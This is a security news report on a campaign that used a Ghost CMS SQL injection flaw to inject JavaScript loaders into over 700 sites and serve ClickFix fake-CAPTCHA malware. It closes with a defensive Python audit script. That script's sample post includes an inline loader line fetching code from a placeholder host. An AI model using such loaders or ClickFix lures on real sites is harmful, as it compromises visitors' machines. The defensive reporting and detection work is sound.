
Threat actors are exploiting recently revealed critical security flaws in Ghost CMS to inject malicious JavaScript code in order to facilitate ClickFix attacks.
According to QiAnXin XLab, this activity involves the exploitation of CVE-2026-26980 (CVSS score: 9.4), a SQL injection vulnerability in Ghost’s Content API that could allow an unauthenticated attacker to read arbitrary data from the database. This security flaw was resolved in version 6.19.1 in February 2026. This vulnerability was discovered by Anthropic using Claude.
The vulnerability is severe because it lets an attacker obtain a site’s Admin API keys without authorization. With an Admin API key, the attacker can call the Admin API and directly modify published articles in the content management system, injecting malicious code and compromising the site.
According to XLab, the attackers exploited the security flaw to “obtain the target site’s Admin API key without permission, modify articles in bulk using the Ghost Admin API, and inject a malicious JavaScript loader at the bottom of the page to facilitate a fake CAPTCHA attack.”
The activity has been described by the Chinese security vendor as a “massive poisoning” campaign that weaponizes a flaw in Ghost CMS. At least two distinct threat clusters are assessed to be behind the campaign, which in some cases injected malicious code into specific sites within a day. It was first detected on May 7, 2026.
In total, more than 700 websites were compromised in this campaign, spanning the university, blockchain, artificial intelligence, software-as-a-service, security research, media, and financial technology sectors. The compromise of legitimate websites may make the ClickFix attacks even more successful, XLab said.
The JavaScript code inserted at the bottom of each article acts as a two-stage loader that retrieves the main payload from an external domain (clo4shara[.]xyz) at runtime. This architecture gives the threat actors the flexibility to swap payloads based on different criteria while keeping the loader unchanged across multiple compromised sites.

“Accessing clo4shara[.]xyz/11z77u3.php directly reveals a piece of code, but it is actually a typical traffic distribution script. Its core functionality is to collect various fingerprint information from the user’s browser, upload it to a server, and perform actions such as redirects, pop-ups, and downloads based on the returned instructions,” XLab explained. The PHP script is powered by Adspect, a commercial cloaking service.
The idea behind using cloaking scripts is to ensure that security scanners and crawlers see only benign web pages, while the actual payload is served only to real victims. The script also supports 19 different commands that execute arbitrary JavaScript code and enable remote control of the victim’s browser.
Site visitors deemed to be the intended targets are eventually served a fake CAPTCHA verification page, inside an iframe HTML element, asking them to prove they are human. This leads to the ClickFix step, in which the victim is prompted to copy a Base64-encoded command and paste it into the Windows Run dialog.
This command acts as a dropper that delivers a ZIP archive, from which a Windows batch script is extracted and run. The script runs a PowerShell command to download a DLL file from a remote domain and launches it with ‘rundll32.exe’, which opens a fake web page to distract the user.
Subsequent iterations of the malware have been found to replace the DLL with a JavaScript payload. Regardless of the payload type, the ultimate goal of the attack is to drop a Windows executable. In the DLL case, the executable is a PuTTY client with a valid code-signing certificate; the binary distributed via JavaScript is an Inno Setup installer for an Electron application.
This application is a modified version of the open-source Grape desktop client, designed to achieve persistence and poll a remote server (web-telegram[.]ug) every 30 seconds for commands issued by the attacker, such as running JavaScript code or executable files.
Ghost CMS users are encouraged to upgrade their instances to the latest version, rotate all credentials, clean the site, audit access logs for signs of suspicious activity, and notify users who may have visited the site during the exposure period about a possible breach.
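One way to carry out the content audit recommended above, as an added example that is not part of the article or of XLab’s analysis: the script below takes the HTML of each post (in practice from a Ghost JSON export or the Admin API posts endpoint; here from constructed samples with a placeholder hostname) and flags any `<script>` that loads from a host outside a site-specific allowlist, including inline loaders that assemble the external URL at runtime, which is the two-stage pattern described above. The allowlist and sample posts are assumptions to be replaced with your site’s own values.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts from (assumption: site-specific allowlist).
ALLOWED_SCRIPT_HOSTS = {"cdn.jsdelivr.net"}
# Absolute or protocol-relative URLs inside inline script bodies (heuristic).
URL_RE = re.compile(r"(?:https?:)?//([A-Za-z0-9.-]+\.[A-Za-z]{2,})")

class ScriptCollector(HTMLParser):
    """Collects every <script> in a post: its src attribute and any inline body."""
    def __init__(self):
        super().__init__()
        self.scripts, self._open = [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts.append({"src": dict(attrs).get("src"), "body": ""})
            self._open = True
    def handle_endtag(self, tag):
        if tag == "script":
            self._open = False
    def handle_data(self, data):
        if self._open and self.scripts:
            self.scripts[-1]["body"] += data

def script_findings(post_html):
    """Return script hosts in post_html that are not on the allowlist: direct
    <script src=...> tags and inline loaders that build an external URL at runtime
    (the two-stage pattern). A relative src is same-origin and ignored."""
    parser = ScriptCollector()
    parser.feed(post_html)
    hosts = set()
    for s in parser.scripts:
        if s["src"] and urlparse(s["src"]).netloc:
            hosts.add(urlparse(s["src"]).netloc.lower())
        hosts.update(h.lower() for h in URL_RE.findall(s["body"]))
    return sorted(h for h in hosts if h not in ALLOWED_SCRIPT_HOSTS)

def audit_posts(posts):
    """posts: iterable of (post_id, html), e.g. from a Ghost JSON export or the Admin
    API posts endpoint. Returns {post_id: [unexpected hosts]} for flagged posts only."""
    return {pid: hosts for pid, html in posts if (hosts := script_findings(html))}

# Constructed sample posts (not real site content); the hostname is a placeholder.
SAMPLE_POSTS = [
    ("clean", '<p>Hello</p><script src="https://cdn.jsdelivr.net/x.js"></script>'),
    ("injected", "<p>Article text</p>\n<script>var s=document.createElement('script');"
                 "s.src='//loader.example-bad.test/11z.php';document.body.appendChild(s);</script>"),
]
```

Any post that appears in the returned dictionary should be reviewed by hand and restored from a known-good copy, and the flagged hosts are a starting point for the access-log review.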
